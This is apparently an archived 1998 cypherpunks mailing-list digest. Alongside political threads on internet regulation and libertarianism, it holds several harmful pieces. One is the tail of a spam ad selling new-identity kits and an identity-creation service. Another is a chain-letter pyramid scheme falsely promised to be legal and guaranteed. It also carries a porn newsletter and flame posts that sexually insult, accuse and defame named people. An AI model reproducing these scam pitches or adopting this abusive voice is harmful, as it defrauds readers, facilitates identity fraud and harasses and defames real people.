AND GET BACK WHAT YOU HAVE PREVIOUSLY PAID.

Plus spiritual and general tips!

ALL OF THE ABOVE, EVERYTHING FOR ONLY, HOW MUCH?   $99.95 plus $9.95 s&h
IF YOUR REQUEST IS SENT NO LATER THAN FEB. 19, 1998 (allow 10 business
days from the time we receive your request to receive your order, checks to longer) 
or ADD $15.00 for an EXPRESS ORDER (please allow 5 business days from the time we
receive your request, checks take longer).  What is it WORTH?  UNLIMITED!
CA residents add $7.75 sales tax.  For international orders add and additional $20 for
shipping.  U.S. DOLLARS ONLY.

Order by Feb. 19, 1998 and receive two FREE GIFTS REPORTS:
1.  "How to Get $1000 - $5000 FREE & CLEAR Within 30 days (It works! It takes a little
work, but it's worth it).
2.  "20 Businesses You Can Start From Home, and become RICH!"

If you order after Feb. 19, 1998 add on an additional $15.

Fax or mail your check (we take checks by fax too) or VISA/MasterCard information 
(CREDIT CARD NAME, BILLING ADDRESSES, billing addresses will be verified 
and orders will be mailed there, no exceptions, HOME PHONE NUMBER and area code are 
also required by VISA/MasterCard for order that are not in person AND CREDIT
CARD EXPIRTATION DATE), also send your email address just in case we need to contact you.

Fax number:
(209) 952-8555 (if faxing a check, fill in all of the information, 
tape it on a piece of paper, do not put tape over the check.  
Print your name and email address just in case we need to 
contact you if something is not clear on the check).  Include your mailing address if
different than address on check.  State "This is my check and I authorize your to take 
this one time draft out of my account for $______ (state the dollar amount, whatever
your wrote on the check).  It is not necessary to mail in the fax check.

Address: 
Noble State Ent.
1163 East March Lane, Suite D719
Stockton, CA 95210

You may also send us a money order by mail.

***BEFORE ORDERING ANYTHING SEE LEGAL WARNING BELOW!***
Also, with all orders, above and below state:  
"THIS IS NOT ENTRAPMENT OR A GOVERNMENT 
STING OPERATION, THIS INFORMATION WILL NOT BE USED AGAINST YOU. 
 I UNDERSTAND THERE ARE NO REFUNDS DUE TO  THE EASE OF USING 
AND/OR COPYING  THE INFORMATION."

Need HELP creating a new identity?  See below.
-----------------------------------------------------------------------------------------------------------
For a finder's fee of only $100 by Feb. 19, 1998 or $120 after, we'll have a company call you
that will CREATE A TOTAL NEW IDENTITY FOR YOU FOR ONLY $1595 (price may
go up soon, so order now if you're interested and have the money).  DO NOT send the
$1595 to us, send only the finder's fee to us of $100 or $120.  You will pay the other company 
the $1595 later. Include with your order, 3 dates and times for someone to call you and a 
phone number with  area code (NO PAGERS OR 800#'s, but phone booths are o.k. if it will 
take incoming calls because not all do).  IF YOU WANT THIS PLEASE STATE WITH ORDER 
" I WANT SOMEONE TO CREATE A NEW IDENTITY FOR ME."  Because you may get the Life 
Enhancement Kit by accident if you don't, and there are no refunds.  You may also get the 
Life Enhancement Kit (excluding the 5 new identity books) for only $25.00 plus the $100  or $120 
finder's fee, whichever is applicable. Sales tax and shipping are included.  Add $15 for EXPRESS ORDERS.

***WARNING!!!  You must be 18 years or older to purchase this information.  This information 
is provided for ENTERTAINMENT PURPOSES ONLY!  Neither the writers, producers,
or distributers assume any responsibility for the use or misuse of any information presented.
The FRAUDULENT USE OF ID IS ILLEGAL and punishable by fine and/or imprisonment!

P.S. THIS IS A ONE TIME MAILING FROM US (unless you have more than one
email address)  NO NEED TO TYPE REMOVE. 

ATTN. FLAMERS,  We don't mean to offend you,
but we ALL get unsolicited mail from the postal service EVERYDAY, this is the same
thing, it's just a part of life and IT IS NOT ILLEGAL TO DO IT.  There is really no need
to be angry.  By the way, too much anger is bad for your health, RELAX AND ENJOY
LIFE!  PEACE TO YOU!  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Thu, 12 Feb 1998 05:05:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199802121246.EAA20478@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy Mayhem will fuck anything that moves, 
but he'd rather be fucking his own mother's dead 
body.

              <<<<
             o(0-0)o
          -ooO-(_) Ooo-- Timothy Mayhem





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 11 Feb 1998 21:11:08 -0800 (PST)
To: Declan McCullagh <declan@well.com>
Subject: Re: Transcript of Hillary Clinton's comments on Net-regulation
In-Reply-To: <Pine.GSO.3.95.980211145506.19600I-100000@well.com>
Message-ID: <Pine.BSI.3.96.980212044819.22380E-100000@usr05.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Feb 1998, Declan McCullagh wrote:

> 
> 	I don't have any clue about what we're going to do legally,
> regulatorily, technologically -- I don't have a clue.  But I do think
> we always have to keep competing interests in balance.  I'm a big
> pro-balance person.  That's why I love the founders -- checks and
> balances; accountable power.  Anytime an individual or an institution
> or an invention leaps so far out ahead of that balance and throws a
> system, whatever it might be -- political, economic, technological --
> out of balance, you've got a problem, because then it can lead to the
> oppression people's rights, it can lead to the manipulation of
> information, it can lead to all kinds of bad outcomes which we have
> seen historically.  So we're going to have to deal with that.  And I
> hope a lot of smart people are going to --
>
    pro-balance? JAFR --just another form of regulation. the concept
    of free thought for anyone outside of the inner circle has never
    occurred to Hillary. does Chelsea view Hillary as her "mother" or
    as an automan who conceived her before her clocked ticked out?
    all the show of family is a sham for Hillary; Hillary is straight
    out of "Logan's Run" and automated child care --the global village
    concept of procreation, child rearing, and education in a protypical
    defined environment to the party line.

 
> 	Q Sounds like you favor regulation.
> 
    even Kathy picked up on that one!


> 	MRS. CLINTON: Bill, I don't know what -- that's why I said I
> don't know what I'm in favor of.  And I don't know enough to know
> what to be in favor of, because I think it's one of those new issues
> we've got to address.  We've got to see whether our existing laws
> protect people's right of privacy, protect them against defamation.
> And if they can, how do you do that when you can press a button and
> you can't take it back.  So I think we have to tread carefully.
> 
    if you print a newspaper, you can not retract the comment (but
    the distribution is less). the government will attack the 
    remailers on accountability, yet the courts have consistently
    ruled on the constitutionality of anonymous handbills. 

    why do they not come out and state what their real agenda is?
    the internet is not the controlled media (the gatekeepers of
    Hillary's later comments --in fact that is the most direct
    reference to government leaning on the press I have seen in
    print by a high ranking power behind the throne.

    the issue is that the internet strikes fear in the hearts of
    the scalawags, bounders, and highwaymen posing as our elected
    representatives to what was _our_ republic.

	attila out...    again







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Sims" <jellicle@inch.com>
Date: Thu, 12 Feb 1998 04:11:31 -0800 (PST)
To: Declan McCullagh <declan@pathfinder.com>
Subject: Re: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <199802101856.NAA04719@arutam.inch.com>
Message-ID: <199802121211.HAA19946@arutam.inch.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan wrote: [to cypherpunks for no apparent reason]

> >None of this is news to Declan of course.  I just get disappointed
> >when I see industry mouthpiece after industry mouthpiece without a
> >single goal in mind except maximum profit.  Libertarianism in
> >action - corporations sell your ass down the road for a dollar and
> >some stock options.
> 
> I'm sure Michael was upset and not typing clearly. He knows as well
> as anyone that libertarians are not pro-business; they're
> pro-individual rights.

Except, of course, that *businesses* count as individuals in a 
libertarian world.  Yes, the corporation, that creation wholly of 
government, becomes a sort of super-individual - and of course all 
individuals are equal, but some are just a bit more equal.

When I see a libertarian calling for an elimination of all forms of 
corporations and a return to sole proprietorships and straight 
partnerships as the only form of business, then I'll know he's 
ideologically consistent.  Until then, pro-business is the only 
reasonable way to describe the twisted rationale behind 
libertarianism.

Which brings me back to my original point - the AIM representation at 
the aforementioned hearings.  In Libber-land, there's nothing 
reprehensible there.  Corporations are lobbying for their "individual 
rights", one of them being the right to make maximum profit by 
eliminating/marginalizing competitors.  Of course the rights they are 
lobbying for may infringe on some others' rights, perhaps in schools 
or libraries which receive federal funds, but hey, that's life for 
you.  Every individual has an equal chance.  And after all, freedom 
to speak and receive information is just a preference - some people 
prefer to receive more of it than others.

> Libertarians spend quite a bit of time
> complaining about the Republican habit of funding corporate
> subsidies.

But very very little time complaining about the *existence* of 
corporations whose primary function is to shield the important folks 
who run and fund the corporation from the consequences of their 
actions.  Come on!  This should be a primary offense!  Individuals 
with no responsibility!


> The pursuit of profit in the free market is not to be discouraged --
> without it, we wouldn't have the Internet we have today.

Heavens, Declan, you're right!  All those companies selflessly 
creating a network between universities and defense sites, not 
seeking a return in five years but looking well into the future..... 
Let us praise the foresight of those companies.  What were their 
names again?


-- Michael Sims




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 12 Feb 1998 05:23:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Me & Louis Freeh
In-Reply-To: <v03007800b10823dff190@[168.161.105.216]>
Message-ID: <c1Hske11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh <declan@well.com> writes:

> Geez, I was wondering why I hadn't heard anything from Vulis in so long.
> Forgot I killfiled him half a year ago.

Translation: Declan is eagerly reading everything I write, ready to
masturbate whenever I mention his name.

> >   >   I don't like people who forge quotes from me in their netly news
> >"exposes",
> >   >   as Declan has done.

Should I follow CDT's example and complain to Declan's bosses at Time Warner
about his lies, forgeries, and fabrications?

I find it amusing that Declan is acting as a judge of what constitutes
orthodox libertarianism.  Please recall that Declan was one of the few
people on this list who wholeheartedly supported Gilmore/Sandfart's
"moderation experiment" and editorialized in favor of Gilmore trying to
kick me off of this mailing list.  Note also that Timmy "cocksucker" May
and his new friend, the degenerate child molester Guy Polis, are again
flooding this mailing list with forged spam while calling for moderating it.

I'm also amused by Declan's refusal to answer my question (whether he is
an alcoholic).  Declan's role models in malicious journalism are scum like
the pathological liar Charlie Platt and the late Chris French.  Numerous
articles posted on sci.cryonics by Platt's former business partners in
his fraudulent "corpsicle" venture describe him as "perpetually drunk".
Chris French too used to start drinking early in the morning and was in
the state of drunken stupor by early afternoon.  I hope that my exposing
him to AP as a Declan-class liar and an incompetent forger contributed to
his drinking himself to death.

Where is Chris French buried?  I feel like pissing on his grave.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 12 Feb 1998 08:33:39 -0800 (PST)
To: "Michael Sims" <declan@pathfinder.com>
Subject: Re: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <v03007807b106593348bc@[168.161.105.216]>
Message-ID: <3.0.5.32.19980212083416.007c5a20@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 AM 2/12/98 -0400, Michael Sims wrote:
>
>Except, of course, that *businesses* count as individuals in a 
>libertarian world.  

No, its that the owner of a business doesn't lose his rights
by virtue of running a business.


Yes, the corporation, that creation wholly of 
>government, becomes a sort of super-individual - and of course all 
>individuals are equal, but some are just a bit more equal.

No, the people running any size corp. have the same rights as
everyone else, to non-interference, etc.

>When I see a libertarian calling for an elimination of all forms of 
>corporations and a return to sole proprietorships and straight 
>partnerships as the only form of business, then I'll know he's 
>ideologically consistent.  

Actually, libs have nothing for or against corps. ---only govt
interfering with them.

I'm not sure where you got your ideas about liberty, or
what anti-corporate libs you hang out with, but your
model of libertarianism is off.

If the natural (efficient) size of a company is big, so be it.
As long as you don't defraud or use force, you have the right
to grow unimpeded by govt to any size that the market selects.
No interference, no subsidies, same thing.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Thu, 12 Feb 1998 07:40:25 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Thu Feb 12 '98
Message-ID: <19980212083920.1744.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Thursday's issue of Eureka!

UNFAITHFUL
Just once in a while  a brand new site comes along that will
blow your mind,  and Unfaithful  is one of them.  Brought to
you by two  of the biggest  names on the web,  Intertain and
Playgal,  it offers MORE than both sites put together, which
includes  an amazing  3,000 video feeds - yes,  thousands of
hot, streaming videos, many totally live, and some even with
audio too!  With it's FREE trial offer don't miss this site!
Unfaithful ... http://www.unfaithful.com/banner_Eureka0.html

Just Say SEX
http://www.justsay.com/index2.htm
With over 1000 nude celeb pics, the widest variety of
hardcore kink, the freshest amateurs, the hotest exclusive
stories, and THE best FREE Swinger Site on the net, why do
you need to go anywhere else?

RAVISHING RENEE'
Oh yes, you betcha, uh huh!  This is one hot young amateur!
Drop on by her website to see some great pix!  Check out the
gallery to see what I mean.  She paints herself, shows off
those tiny titt nipples through tight fabric and wears some
short shorts with just enough ass hanging out to keep you
clicking for more.  Do not miss the massage section either!
Ravishing Renee' .................. http://qstart.com/renee/

CAM GIRLS CHEYENNE
Definitely worth a stop on your endless surf for hot looking
porno pix.  This site features a sweet young lady showing us
her goods. Rubbing her box, licking other girls and there is
a bonus here! Free videos for everyone. Pretty cool mix here!
Cam Girls .......... http://www.cam-girls.com/html/chey.html

HOT BABES
This site is not going to win any design awards but I give
it a 10 for being simple.  It features good looking women.
In various positions and showing their goods.  Just click on
an image and your off to the next one.  Simple but efective!
Hot Babes ................ http://www.shadowx.com/babe5.html

SEXJUICE  ***FREE TODAY!!***
This is a paysite. But get this, we again have a special deal
for you today and today only! That's right Sexjuice is giving
us free video feeds for 24 hours which includes all video feeds
and a HUGE 350 page magazine updated every month. The video is
real, not some crappy clip cut out of an old porno flick. Check
it out FREE now and find which of the awesome video packages 
is free - HURRY this offer is extremely limited and ONLY for
Eureka subscribers! You'll be directing the hot babe action 
in no time!  This is a do not miss situation.  Go there now!
Sexjuice ................ http://www.sexjuice.net/eureka.asp



READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Six free feeds --------------------> http://207.136.152.129/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Tristina: This lady loves  behinds,  no  ands,  ifs or BUTTs
about it! Trisitna loves bottoms  so much, she dedicated her
site to asses. So visit  this  site,  and  see why we are so
tongue in CHEEK about her booty page.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
The Top 50 Erotic  Stories  Sites:  Only the highest quality
erotic stories sites are listed  here. No nonsence. Just top
notch totally free free erotic stories sites................
........................... http://www.xxxstories.com/top50/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?120
Pic  2 --------------------------> http://137.39.63.229/?121
Pic  3 --------------------------> http://137.39.63.229/?122
Pic  4 --------------------------> http://137.39.63.229/?123
Pic  5 --------------------------> http://137.39.63.229/?124
Pic  6 --------------------------> http://137.39.63.229/?125
Pic  7 --------------------------> http://137.39.63.229/?126
Pic  8 --------------------------> http://137.39.63.229/?127
Pic  9 --------------------------> http://137.39.63.229/?128
Pic 10 --------------------------> http://137.39.63.229/?129

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 12 Feb 1998 05:46:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dr. Dimento again
Message-ID: <199802121346.IAA14820@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


It's time for "ASK GUY ANYTHING"!

   >   From Doctor Net Twinkie <dlv@bwalk.dm.com> Thu Feb 12 08:23:31 1998
   >   To: cypherpunks@toad.com
   >   
   >   I am a pathetic old fart who is outwitted even by "retards" these days.
   >   
   >   What is wrong with me?
   >
   >   ---
   >    
   >   Dr. Doctor Net Twinkie KOTM
   >   Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

GUY RESPONDS:

Dear Twinkie,

The problem is you no longer have all that good white creamy stuff.

It's solidified...you are literally hard-headed now.

You can't even...

: Subject: Re: Changing to Moderated Cypherpunks -- How?
: From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
: Date: Thu, 05 Feb 98 19:25:52 EST
: 
: Guy Polis thinks that anyone smarter than him (and that's 99.99% of the
: population) is my tentacle.

...think of a new insult...

: Subject:      Re: Homosexual anti-Semite Peter Vorobieff is forging cancels for our articles again!!1!
: From:         Rabbi Shlomo Ruthenberg <shlomo@bwalk.dm.com>
: Date:         1997/05/06
: Newsgroups:   news.admin.net-abuse.policy
: 
: To homosexual anti-semites like Peter Vorobieff and Dan Koroleff,
: anyone smarter than them must be a "kike" - and this means 99.99%
: of the population.

You haven't had an original thought in a decade.

To get things CRANKing again, take a sledgehammer
and pound yourself in the head until it is a nice
soft consistency.

You'll feel much better.

YOU'RE WELCOME!
---guy

   Traffic analysis confirms Dimitry is Shlomo - have a great Shabbos!

   HA HA HA HA HA HA HA HA HA HA HA cough cough HA HA HA HA HA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 12 Feb 1998 05:54:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Me & Louis Freeh
Message-ID: <199802121354.IAA15240@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


It's time for "ASK GUY ANYTHING" again!

   >   Subject: Re: Me & Louis Freeh
   >   From: dlv@bwalk.dm.com (Dr. Doctor Net Twinkie KOTM)
   >   
   >   Declan McCullagh <declan@well.com> writes:
   >   
   >   > Geez, I was wondering why I hadn't heard anything from Vulis in so long.
   >   > Forgot I killfiled him half a year ago.
   >   
   >   WHAAAAA! WHAAAA! Nobody wants to read what I have to say!
   >   
   >   I don't understand! Someone please explain?
   >   
   >   ---
   >   
   >   Dr. Doctor Net Twinkie KOTM
   >   Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

GUY REPLIES:

Dear Twinkie,

   The answer is simple:

      You are so full of shit, flies worship you as the One True God!

YOU'RE WELCOME!
---guy

   What a loser!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lizard <lizard@mrlizard.com>
Date: Thu, 12 Feb 1998 09:57:03 -0800 (PST)
To: "Michael Sims" <declan@pathfinder.com>
Subject: Re: "Corporations selling your ass down the road for a dollar"
In-Reply-To: <v03007807b106593348bc@[168.161.105.216]>
Message-ID: <3.0.1.32.19980212095051.00bec7b0@dnai.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:10 AM 2/12/98 -0400, Michael Sims wrote:

>When I see a libertarian calling for an elimination of all forms of 
>corporations and a return to sole proprietorships and straight 
>partnerships as the only form of business, then I'll know he's 
>ideologically consistent.  Until then, pro-business is the only 
>reasonable way to describe the twisted rationale behind 
>libertarianism.

I've been saying that for a long time. I'm not 100% certain I wish to
eliminate entirely the corporation, but the idea of an 'artificial person'
as an entity to take the blame for crimes committed by real people is
highly dubious to me. If Monty Burns says, "Let's dump the toxic waste in
the school ground, who cares if some kids die!", then it should be he who
faces criminal charges -- not his corporation which gets fined.

A corporation, like any collective entity, is at best a convenience -- a
way to deal with large numbers of individuals by providing a central
identifying tag. This way, "Motorola Chips" can sell to "Apple Computer",
and the deal remains valid even if the chip-seller at Motorola and the
chip-buyer at Apple quit their jobs, because the contract was not between
those two individuals, but between the companies they represented. But just
as there is in truth no 'society', no 'race', no 'people', there is also,
in truth, no corporation -- it must all come down to individual acts and
individual responsibilities.

>Which brings me back to my original point - the AIM representation at 
>the aforementioned hearings.  In Libber-land, there's nothing 
>reprehensible there.  Corporations are lobbying for their "individual 
>rights", one of them being the right to make maximum profit by 
>eliminating/marginalizing competitors.  

Not with the power of government behind them. That's like saying there's
nothing wrong with Joe's Deli asking Vinnie The Torch to pay a little
'visit' to Max's Deli across the street.

You eliminate/marginalize competition by convincing consumers to purchase
your products over theirs. Not by having the government regulate them out
of business. What you're looking at is corporate socialism -- the current
perversion of the 'free market' that America is living under.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kozmo killah <k0zm0z@yahoo.com>
Date: Thu, 12 Feb 1998 11:51:34 -0800 (PST)
To: Greg Lehey <grog@lemis.com>
Subject: Re: help with editor?
Message-ID: <19980212194840.5943.rocketmail@send1d.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/html





I Never Thought I'd Be the One Telling You This:

                    I Actually Read a Piece of E-Mail & I'm Going to
Europe on the Proceeds!


Hello!

My name is Karen Liddell; I'm a 35-year-old mom, wife, and part-time
accountant. As a rule, I delete all unsolicited "junk"
e-mail and use my account primarily for business. I received what I
assumed was this same e-mail countless times and deleted
it each time.

About two months ago I received it again and, because of the catchy
subject line, I finally read it. Afterwards, I thought , "OK,
I give in, I'm going to try this. I can certainly afford to invest $20
and, on the other hand, there's nothing wrong with creating a
little excess cash." I promptly mailed four $5 bills and, after
receiving the reports, paid a friend of mine a small fee to send out
some e-mail advertisements for me. After reading the reports, I also
learned how easy it is to bulk e-mail for
free! 

I was not prepared for the results. Everyday for the last six weeks, my
P.O. box has been overflowing with $5 bills; many days
the excess fills up an extra mail bin and I've had to upgrade to the
corporate-size box! I am stunned by all the money that
keeps rolling in!

My husband and I have been saving for several years to make a
substantial downpayment on a house. Now, not only are we
purchasing a house with 40% down, we're going to Venice, Italy to
celebrate!

I promise you, if you follow the directions in this e-mail and be
prepared to eventually set aside about an hour each day to
follow up (and count your money!), you will make at least as much money
as we did. You don't need to be a wiz at the
computer, but I'll bet you already are. If you can open an envelope,
remove the money, and send an e-mail message, then
you're on your way to the bank. Take the time to read this so you'll
understand how easy it is. If I can do this, so can you!

GO FOR IT NOW!!

Karen Liddell
The following is a copy of the e-mail I read:


              
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

                         This is a LEGAL, MONEY-MAKING PHENOMENON.
                      PRINT this letter, read the directions, THEN READ
IT AGAIN !!!


You are about to embark on the most profitable and unique program you
may ever see. Many times over, it has demonstrated
and proven its ability to generate large amounts of cash. This program
is showing fantastic appeal with a huge and
ever-growing on-line population desirous of additional income.

This is a legitimate, LEGAL, money-making opportunity. It does not
require you to come in contact with people, do any hard
work, and best of all, you never have to leave the house, except to get
the mail and go to the bank! 

"This truly is that lucky break you've been waiting for! Simply follow
the easy instructions in this letter, and your financial
dreams can come true! When followed correctly, this electronic,
multi-level marketing program works perfectly...100%
EVERY TIME!"

Thousands of people have used this program to:
- Raise capital to start their own business
- Pay off debts
- Buy homes, cars, etc., 
- Even retire! 

"This is your chance, so don't pass it up!"

                
----------------------------------------------------------------------------------
                              OVERVIEW OF THIS EXTRAORDINARY 
                        ELECTRONIC MULTI-LEVEL MARKETING PROGRAM
                
----------------------------------------------------------------------------------


Basically, this is what we do:

We send thousands of people a product for $5.00 that costs next to
nothing to produce and e-mail. As with all multi-level
businesses, we build our business by recruiting new partners and
selling our products. Every state in the U.S. allows you to
recruit new multi- level business online (via your computer).

The products in this program are a series of four business and
financial reports costing $5.00 each. Each order you receive via
"snail mail" will include:

* $5.00 cash
* The name and number of the report they are ordering
* The e-mail address where you will e-mail them the report they ordered.

To fill each order, you simply e-mail the product to the buyer. THAT'S
IT! The $5.00 is yours! This is the EASIEST
electronic multi-level marketing business anywhere! 

                         FOLLOW THE INSTRUCTIONS TO THE LETTER AND
                       BE PREPARED TO REAP THE STAGGERING BENEFITS!

                               ******* I N S T R U C T I O N S *******


This is what you MUST do:

1. Order all 4 reports shown on the list below (you can't sell them if
you don't order them).

* For each report, send $5.00 CASH, the NAME & NUMBER OF THE 
REPORT YOU ARE ORDERING, YOUR E-MAIL ADDRESS, and YOUR
RETURN POSTAL ADDRESS (in case of a problem) to the person whose 
name appears on the list next to the report.

* When you place your order, make sure you order each of the four
reports. You will need all four reports so that you can save them
on your computer and resell them.

* Within a few days you will receive, via e-mail, each of the four
reports. 
Save them on your computer so they will be accessible for you to send 
to the 1,000's of people who will order them from you.

2. IMPORTANT-- DO NOT alter the names of the people who are listed next 
to each report, or their sequence on the list, in any way other than is
instructed below in steps "a" through "d" or you will lose out on the
majority of your profits. Once you understand the way this works,
you'll 
also see how it doesn't work if you change it. Remember, this method 
has been tested, and if you alter it, it will not work.

a. Look below for the listing of available reports.

b. After you've ordered the four reports, replace the name and address 
under REPORT #1 with your name and address, moving the one that 
was there down to REPORT #2. 

c. Move the name and address that was under REPORT #2 down to 
REPORT #3. 

d. Move the name and address that was under REPORT #3 down to 
REPORT #4. 

e. The name and address that was under REPORT #4 is removed from
the list and has NO DOUBT collected a very large sum of money.

                   Please make sure you copy everyone's name and
address ACCURATELY!!!


3. Take this entire letter, including the modified list of names, and
save 
it to your computer. Make NO changes to the instruction portion of this 
letter.

4. Now you're ready to start an advertising campaign on the
WORLDWIDE WEB! Advertising on the WEB is very, very inexpensive,
and there are HUNDREDS of FREE places to advertise. Another
avenue which you could use for advertising is e-mail lists. 
You can buy these lists for under $20/2,000 addresses or you
can pay someone a minimal charge to take care of it for you. 
BE SURE TO START YOUR AD CAMPAIGN IMMEDIATELY!

5. For every $5.00 you receive, all you must do is e-mail them the
report
they ordered. THAT'S IT! ALWAYS PROVIDE SAME-DAY SERVICE 
ON ALL ORDERS! This will guarantee that the e-mail THEY send out,
with YOUR name and address on it, will be prompt because they can't
advertise until they receive the report!

                               
------------------------------------------
                                    AVAILABLE REPORTS
                               
------------------------------------------
                       ***Order Each REPORT by NUMBER and NAME***


Notes:
- ALWAYS SEND $5 CASH FOR EACH REPORT 
- ALWAYS SEND YOUR ORDER VIA FIRST CLASS MAIL 
- Make sure the cash is concealed by wrapping it in at least two sheets
of paper 
- On one of those sheets of paper, include: (a) the number & name of
the report you are ordering, (b) your e-mail address,
and (c) your postal address.
_________________________________________________________________
REPORT #1 "HOW TO MAKE $250,000 THROUGH MULTI-LEVEL SALES" 

ORDER REPORT #1 FROM: 
KBL
P.O. Box 624-4960
Irvine, CA 92616-4960
_________________________________________________________________
REPORT #2 "MAJOR CORPORATIONS AND MULTI-LEVEL SALES"

ORDER REPORT #2 FROM:
TLK Enterprises
1439 North Berwick
Indianapolis, IN 46222
_________________________________________________________________
REPORT #3 "SOURCES FOR THE BEST MAILING LISTS"

ORDER REPORT #3 FROM:
MEV
PO Box 5153
GREENWICH, CT 06831
_________________________________________________________________
REPORT #4 "EVALUATING MULTI-LEVEL SALES PLANS"

ORDER REPORT #4 FROM:
Pat Owens
309 Teakwood Dr.
Monroe, LA 71203
__________________________________________________________________________________________________________________________________

          
--------------------------------------------------------------------------------------------------
                               HERE'S AN EXAMPLE OF HOW THIS 
                            AMAZING PLAN CAN MAKE YOU $MONEY$
          
--------------------------------------------------------------------------------------------------


Let's say you decide to start small just to see how well it works.
Assume your goal is to get 10 people to participate on your
first level. (Placing a lot of FREE ads on the internet will EASILY get
a larger response.) Also assume that everyone else in
YOUR ORGANIZATION gets ONLY 10 downline members. Follow this example to
achieve the STAGGERING results
below.

1st level--your 10 members with
$5...........................................$50
2nd level--10 members from those 10 ($5 x 100)..................$500
3rd level--10 members from those 100 ($5 x 1,000)..........$5,000
4th level--10 members from those 1,000 ($5 x 10,000)...$50,000
THIS TOTALS ----------->$55,550

Remember friends, this assumes that the people who participate only
recruit 10 people each. Think for a moment what would
happen if they got 20 people to participate! Most people get 100's of
participants! THINK ABOUT IT!

Your cost to participate in this is practically nothing (surely you can
afford $20). You obviously already have an internet
connection and e-mail is FREE!!! REPORT#3 shows you the most productive
methods for bulk e-mailing and purchasing
e-mail lists. Some list & bulk e-mail vendors even work on trade!

             About 250,000 new people get online every month, just on
one service alone!

